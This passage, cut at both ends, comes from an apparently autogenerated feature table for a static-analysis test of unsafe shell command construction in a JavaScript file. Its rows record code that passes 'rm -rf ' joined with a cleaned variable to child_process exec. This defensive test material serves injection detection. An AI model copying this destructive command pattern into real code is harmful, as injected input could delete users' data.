name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:253:2:253:3 | cp | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:253:2:253:3 | cp | enclosingFunctionBody | name cp exec rm -rf name cleaned cleanInput name cp exec rm -rf cleaned | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:253:2:253:3 | cp | enclosingFunctionName | goodSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:253:2:253:3 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:253:2:253:8 | cp.exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:253:2:253:8 | cp.exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:253:2:253:8 | cp.exec | enclosingFunctionBody | name cp exec rm -rf name cleaned cleanInput name cp exec rm -rf cleaned | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:253:2:253:8 | cp.exec | enclosingFunctionName | goodSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:253:2:253:8 | cp.exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:253:2:253:29 | cp.exec ... leaned) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:253:2:253:29 | cp.exec ... leaned) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:253:2:253:29 | cp.exec ... leaned) | enclosingFunctionBody | name cp exec rm -rf name cleaned cleanInput name cp exec rm -rf cleaned | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:253:2:253:29 | cp.exec ... leaned) | enclosingFunctionName | goodSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:253:2:253:29 | cp.exec ... leaned) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:253:2:253:29 | exceptional return of cp.exec ... leaned) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:253:2:253:29 | exceptional return of cp.exec ... leaned) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:253:2:253:29 | exceptional return of cp.exec ... leaned) | enclosingFunctionBody | name cp exec rm -rf name cleaned cleanInput name cp exec rm -rf cleaned | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:253:2:253:29 | exceptional return of cp.exec ... leaned) | enclosingFunctionName | goodSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:253:2:253:29 | exceptional return of cp.exec ... leaned) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:253:5:253:8 | exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:253:5:253:8 | exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:253:5:253:8 | exec | enclosingFunctionBody | name cp exec rm -rf name cleaned cleanInput name cp exec rm -rf cleaned | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:253:5:253:8 | exec | enclosingFunctionName | goodSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:253:5:253:8 | exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:253:10:253:18 | "rm -rf " | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:253:10:253:18 | "rm -rf " | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:253:10:253:18 | "rm -rf " | enclosingFunctionBody | name cp exec rm -rf name cleaned cleanInput name cp exec rm -rf cleaned | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:253:10:253:18 | "rm -rf " | enclosingFunctionName | goodSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:253:10:253:18 | "rm -rf " | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:253:10:253:18 | "rm -rf " | stringConcatenatedWith | -endpoint- cleaned | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:253:10:253:28 | "rm -rf " + cleaned | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:253:10:253:28 | "rm -rf " + cleaned | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:253:10:253:28 | "rm -rf " + cleaned | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:253:10:253:28 | "rm -rf " + cleaned | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:253:10:253:28 | "rm -rf " + cleaned | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:253:10:253:28 | "rm -rf " + cleaned | enclosingFunctionBody | name cp exec rm -rf name cleaned cleanInput name cp exec rm -rf cleaned | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:253:10:253:28 | "rm -rf " + cleaned | enclosingFunctionName | goodSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:253:10:253:28 | "rm -rf " + cleaned | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:253:10:253:28 | "rm -rf " + cleaned | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:253:22:253:28 | cleaned | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:253:22:253:28 | cleaned | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:253:22:253:28 | cleaned | enclosingFunctionBody | name cp exec rm -rf name cleaned cleanInput name cp exec rm -rf cleaned | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:253:22:253:28 | cleaned | enclosingFunctionName | goodSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:253:22:253:28 | cleaned | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:253:22:253:28 | cleaned | stringConcatenatedWith | 'rm -rf ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:256:5:256:6 | fs | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:256:5:256:6 | fs | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:256:5:256:6 | fs | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:256:5:256:6 | fs | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:256:5:256:22 | fs | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:256:5:256:22 | fs | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:256:5:256:22 | fs | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:256:5:256:22 | fs = require("fs") | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:256:5:256:22 | fs = require("fs") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:256:5:256:22 | fs = require("fs") | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:256:10:256:16 | require | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:256:10:256:16 | require | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:256:10:256:16 | require | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:256:10:256:22 | exceptional return of require("fs") | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:256:10:256:22 | exceptional return of require("fs") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:256:10:256:22 | exceptional return of require("fs") | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:256:10:256:22 | require("fs") | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:256:10:256:22 | require("fs") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:256:10:256:22 | require("fs") | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:256:18:256:21 | "fs" | CalleeFlexibleAccessPath | require | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:256:18:256:21 | "fs" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:256:18:256:21 | "fs" | calleeImports | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:256:18:256:21 | "fs" | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:256:18:256:21 | "fs" | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:256:18:256:21 | "fs" | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:257:1:257:6 | module | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| 